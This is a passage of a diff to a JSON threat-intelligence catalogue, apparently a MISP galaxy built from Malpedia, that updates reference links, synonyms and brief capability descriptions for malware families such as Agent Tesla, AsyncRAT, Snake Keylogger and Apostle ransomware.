"https://github.com/AlessandroZ/LaZagne", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", "https://www.trendmicro.com/en_us/research/20/k/weaponizing-open-source-software-for-targeted-attacks.html", "https://edu.anarcho-copy.org/Against%20Security%20&%20%20Self%20Security/Group-IB%20RedCurl.pdf" ], @@ -7120,12 +8187,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph", + "https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html", "https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/", + "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/", + "https://twitter.com/xuy1202/status/1393384128456794116", "https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/", - "https://blog.netlab.360.com/not-really-new-pyhton-ddos-bot-n3cr0m0rph-necromorph/" + "https://www.lacework.com/the-kek-security-network/", + "https://github.com/lacework/lacework-labs/tree/master/keksec", + "https://www.lacework.com/keksec-tsunami-ryuk/", + "https://twitter.com/xuy1202/status/1392089568384454657", + "https://www.bleepingcomputer.com/news/security/freakout-malware-worms-its-way-into-vulnerable-vmware-servers/", + "https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/" ], "synonyms": [ - "FreakOut" + "FreakOut", + "Necro" ], "type": [] }, @@ -7164,6 +8240,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.poet_rat", "https://blog.talosintelligence.com/2020/04/poetrat-covid-19-lures.html", + "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-stibnite/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf", "https://www.cyborgsecurity.com/cyborg_labs/python-malware-on-the-rise/", @@ -7226,6 +8303,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.responder", + "https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/", "https://github.com/lgandx/Responder" ], "synonyms": [ @@ -7294,6 +8372,7 @@ "description": "", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_001" ], "synonyms": [], @@ -7306,6 +8385,7 @@ "description": "", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002" ], "synonyms": [], @@ -7318,6 +8398,7 @@ "description": "", "meta": { "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003", "https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003" ], "synonyms": [], @@ -7326,6 +8407,19 @@ "uuid": "43282411-4999-4066-9b99-2e94a17acbd4", "value": "unidentified_003" }, + { + "description": "Ransomware written in Python and delivered as compiled executable created using PyInstaller.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/py.venomous", + "https://blog.cyble.com/2021/08/04/a-deep-dive-analysis-of-venomous-ransomware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0bd5aed2-9c74-41a5-9fcf-9379f2cb0e2c", + "value": "Venomous" + }, { "description": "", "meta": { @@ -7339,6 +8433,25 @@ "uuid": "9f85f4fc-1cce-4557-b3d8-b9ef522fafb2", "value": "FlexiSpy (symbian)" }, + { + "description": "CageyChameleon Malware is a VBS-based backdoor which has the capability to enumerate the list of running processes and check for the presence of several antivirus products. CageyChameleon will collect user host information, system current process information, etc. The collected information is sent back to the C2 server, and continue to initiate requests to perform subsequent operations.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon", + "https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/", + "https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314", + "https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf", + "https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf", + "https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/", + "https://www.clearskysec.com/cryptocore-group/", + "https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ea71b7c1-79eb-4e9c-a670-ea75d80132f4", + "value": "CageyChameleon" + }, { "description": "", "meta": { @@ -7418,11 +8531,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion", - "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/", "https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader", - "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/", "https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/", - "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf" + "https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf", + "https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/", + "https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/", + "https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/" ], "synonyms": [], "type": [] @@ -7443,6 +8557,19 @@ "uuid": "a583a2db-616e-48e5-b12b-088a378c2307", "value": "lockscreen" }, + { + "description": "MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email. Based on Fireeye intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID. ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/vbs.mouseisland", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e9afcd80-c1c6-4194-af32-133fe31e835f", + "value": "MOUSEISLAND" + }, { "description": "Downloads NodeJS when deployed.", "meta": { @@ -7522,12 +8649,17 @@ "value": "WhiteShadow" }, { - "description": "", + "description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger", - "https://habr.com/ru/company/group-ib/blog/477198/", - "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89" + "https://twitter.com/James_inthe_box/status/1401921257109561353", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/", + "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89", + "https://habr.com/ru/company/group-ib/blog/477198/" ], "synonyms": [ "404KeyLogger", @@ -7777,7 +8909,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adamantium_thief", - "https://github.com/LimerBoy/Adamantium-Thief" + "https://github.com/LimerBoy/Adamantium-Thief", + "https://twitter.com/ClearskySec/status/1377176015189929989" ], "synonyms": [], "type": [] @@ -7886,6 +9019,7 @@ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", "https://www.msreverseengineering.com/blog/2020/8/31/an-exhaustively-analyzed-idb-for-comrat-v4", + "https://cdn.muckrock.com/foia_files/2021/02/16/21R019_RESPONSE.pdf", "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-303a", @@ -7908,26 +9042,40 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-many-roads-leading-to-agent-tesla/", - "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", - "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", + "https://www.secureworks.com/research/gold-galleon-how-a-nigerian-cyber-crew-plunders-the-shipping-industry", + "https://www.fortinet.com/blog/threat-research/phishing-malware-hijacks-bitcoin-addresses-delivers-new-agent-tesla-variant", + "https://community.riskiq.com/article/40000d46", + "https://community.riskiq.com/article/56e28880", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://blog.malwarelab.pl/posts/basfu_aggah/", + "https://www.telsy.com/download/4832/", + "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", "https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://blogs.juniper.net/en-us/security/aggah-malware-campaign-expands-to-zendesk-and-github-to-host-its-malware", "https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/sophos-2021-threat-report.pdf", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", - "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4", + "https://menshaway.blogspot.com/2021/04/agenttesla-malware.html", + "https://isc.sans.edu/diary/27666", "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-2/", + "https://blogs.blackberry.com/en/2021/06/threat-thursday-agent-tesla-infostealer-malware", "https://www.seqrite.com/blog/gorgon-apt-targeting-msme-sector-in-india/", + "https://news.sophos.com/en-us/2021/06/02/amsi-bypasses-remain-tricks-of-the-malware-trade/", "https://www.zscaler.com/blogs/research/agent-tesla-keylogger-delivered-using-cybersquatting", "https://news.sophos.com/en-us/2021/02/02/agent-tesla-amps-up-information-stealing-attacks/", "https://blog.fortinet.com/2017/06/28/in-depth-analysis-of-net-malware-javaupdtr", + "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", "https://malwarebreakdown.com/2018/01/11/malspam-entitled-invoice-attched-for-your-reference-delivers-agent-tesla-keylogger/", "https://isc.sans.edu/diary/27088", "https://www.secureworks.com/research/threat-profiles/gold-galleon", - "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.proofpoint.com/us/blog/threat-insight/commodity-net-packers-use-embedded-images-hide-payloads", + "https://medium.com/@mariohenkel/decrypting-agenttesla-strings-and-config-b9000b18c996?sk=fcead9538516eeb3daa7b53cb537f6f4", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/", + "https://www.youtube.com/watch?v=Q9_1xNbVQPY", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://labs.sentinelone.com/agent-tesla-old-rat-uses-new-tricks-to-stay-on-top/", - "https://threatresearch.ext.hp.com/aggah-campaigns-latest-tactics-victimology-powerpoint-dropper-and-cryptocurrency-stealer/", + "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html", "https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/", "https://www.telsy.com/wp-content/uploads/ATR_82599-1.pdf", @@ -7939,20 +9087,31 @@ "https://malwatch.github.io/posts/agent-tesla-malware-analysis/", "https://isc.sans.edu/forums/diary/AgentTesla+Delivered+via+a+Malicious+PowerPoint+AddIn/26162/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/another-archive-format-smuggling-malware/", "https://malwr-analysis.com/2020/04/05/trojan-agent-tesla-malware-analysis/", "https://news.sophos.com/en-us/2020/05/14/raticate/", + "http://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://community.riskiq.com/article/6337984e", "https://isc.sans.edu/diary/rss/27092", "https://cofense.com/strategic-analysis-agent-tesla-expands-targeting-and-networking-capabilities/", + "https://twitter.com/MsftSecIntel/status/1392219299696152578", + "https://www.vmray.com/cyber-security-blog/threat-bulletin-agent-tesla/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", "https://www.denexus.io/wp-content/uploads/2021/02/Threat-actor-targeting-gas-oil-supply-chains_public.pdf", "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://blog.malwarelab.pl/posts/basfu_aggah/", + "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", + "http://blog.nsfocus.net/sweed-611/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://mrt4ntr4.github.io/How-Analysing-an-AgentTesla-Could-Lead-To-Attackers-Inbox-1/", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/negasteal-uses-hastebin-for-fileless-delivery-of-crysis-ransomware", - "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/" + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "AgenTesla", @@ -7983,6 +9142,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.albaniiutas", "https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas", + "https://blog.group-ib.com/task", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/" ], "synonyms": [ @@ -8067,9 +9227,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allakore", - "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt", "https://twitter.com/_re_fox/status/1212070711206064131", - "https://github.com/Anderson-D/AllaKore" + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", + "https://github.com/Anderson-D/AllaKore", + "https://www.seqrite.com/documents/en/white-papers/Seqrite-WhitePaper-Operation-SideCopy.pdf", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", + "https://blog.talosintelligence.com/2021/07/sidecopy.html" ], "synonyms": [], "type": [] @@ -8208,7 +9372,8 @@ "http://contagiodump.blogspot.com/2011/02/tdss-tdl-4-alureon-32-bit-and-64-bit.html", "https://www.johannesbader.ch/2016/01/the-dga-in-alureon-dnschanger/", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj64_wowlik.vt", - "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/" + "https://www.virusbulletin.com/virusbulletin/2016/01/paper-notes-click-fraud-american-story/", + "https://www.youtube.com/watch?v=FttiysUZmDw" ], "synonyms": [ "Olmarik", @@ -8227,18 +9392,22 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey", + "https://blog.talosintelligence.com/2021/08/raccoon-and-amadey-install-servhelper.html", "https://twitter.com/ViriBack/status/1062405363457118210", "https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-decrypt-strings-in-amadey-1-09/", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", + "https://medium.com/walmartglobaltech/amadey-stealer-plugin-adds-mikrotik-and-outlook-harvesting-518efe724ce4", "https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/", "https://nao-sec.org/2019/04/Analyzing-amadey.html", + "https://isc.sans.edu/diary/27264", "https://www.anquanke.com/post/id/230116", "https://twitter.com/0xffff0800/status/1062948406266642432", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", - "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" + "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/" ], "synonyms": [], "type": [] @@ -8281,10 +9450,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anchor", - "https://www.netscout.com/blog/asert/dropping-anchor", + "https://isc.sans.edu/diary/27308", "https://technical.nttsecurity.com/post/102fsp2/trickbot-variant-anchor-dns-communicating-over-dns", "https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf", "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/", + "https://www.netscout.com/blog/asert/dropping-anchor", "https://unit42.paloaltonetworks.com/ryuk-ransomware/", "https://hello.global.ntt/zh-cn/insights/blog/trickbot-variant-communicating-over-dns", "https://labs.sentinelone.com/the-deadly-planeswalker-how-the-trickbot-group-united-high-tech-crimeware-apt/", @@ -8293,6 +9463,7 @@ "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://www.kryptoslogic.com/blog/2021/07/adjusting-the-anchor/", "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", "https://thedfirreport.com/2021/03/08/bazar-drops-the-anchor/", "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth" @@ -8308,6 +9479,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.andromeda", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", "https://www.europol.europa.eu/newsroom/news/andromeda-botnet-dismantled-in-international-cyber-operation", "https://blog.avast.com/andromeda-under-the-microscope", "http://blog.morphisec.com/andromeda-tactics-analyzed", @@ -8380,7 +9552,7 @@ "value": "Anel" }, { - "description": "", + "description": "Ransomware that demands payment in Bitcoin.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.antefrigus", @@ -8391,7 +9563,7 @@ "type": [] }, "uuid": "04788457-5b72-4a66-8f2c-73497919ece2", - "value": "AnteFrigus Ransomware" + "value": "AnteFrigus" }, { "description": "", @@ -8412,7 +9584,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis", - "https://twitter.com/MsftSecIntel/status/1298752223321546754" + "https://twitter.com/MsftSecIntel/status/1298752223321546754", + "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/", + "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/" ], "synonyms": [ "Anubis Stealer" @@ -8448,6 +9622,22 @@ "uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96", "value": "Apocalypse" }, + { + "description": "Malware used by suspected Iranian threat actor Agrius, turned from wiper into ransomware.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.apostle", + "https://assets.sentinelone.com/sentinellabs/evol-agrius", + "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/", + "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf", + "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "cb2d3a6f-8ff5-4b08-af95-7377cfe3f7c3", + "value": "Apostle" + }, { "description": "", "meta": { @@ -8476,11 +9666,21 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed", + "https://asec.ahnlab.com/ko/26705/", + "https://www.youtube.com/watch?v=rfzmHjZX70s", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf", "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf", + "https://www.youtube.com/watch?v=Dv2_DK3tRgI", + "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/", + "https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", - "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf" + "https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/", + "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf", + "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf" + ], + "synonyms": [ + "JamBog" ], - "synonyms": [], "type": [] }, "uuid": "c7f8e3b8-328d-43c3-9235-9a2f704389b4", @@ -8592,6 +9792,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.artra", + "https://securelist.com/apt-trends-report-q1-2021/101967/", "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf", "https://www.freebuf.com/articles/database/192726.html", "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/", @@ -8664,9 +9865,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/", "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/", "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/", + "https://isc.sans.edu/diary/27482", "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf", "https://blog.talosintelligence.com/2020/05/astaroth-analysis.html", "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", @@ -8688,15 +9891,31 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", - "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", - "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", - "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://labs.k7computing.com/?p=21759", "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf", "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/", - "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/" + "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns", + "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", + "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html", + "https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", + "https://securelist.com/apt-trends-report-q3-2020/99204/", + "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", + "https://twitter.com/MsftSecIntel/status/1392219299696152578", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", + "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html", + "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies", + "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [], "type": [] @@ -8787,6 +10006,21 @@ "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", "value": "ATMSpitter" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo", + "https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/", + "https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/", + "https://twitter.com/siri_urz/status/1437664046556274694?s=20" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f47633fb-2c2b-46c3-a1e6-2204d56897b8", + "value": "ATOMSILO" + }, { "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", "meta": { @@ -8857,28 +10091,43 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://twitter.com/Securityinbits/status/1271065316903120902", + "https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", 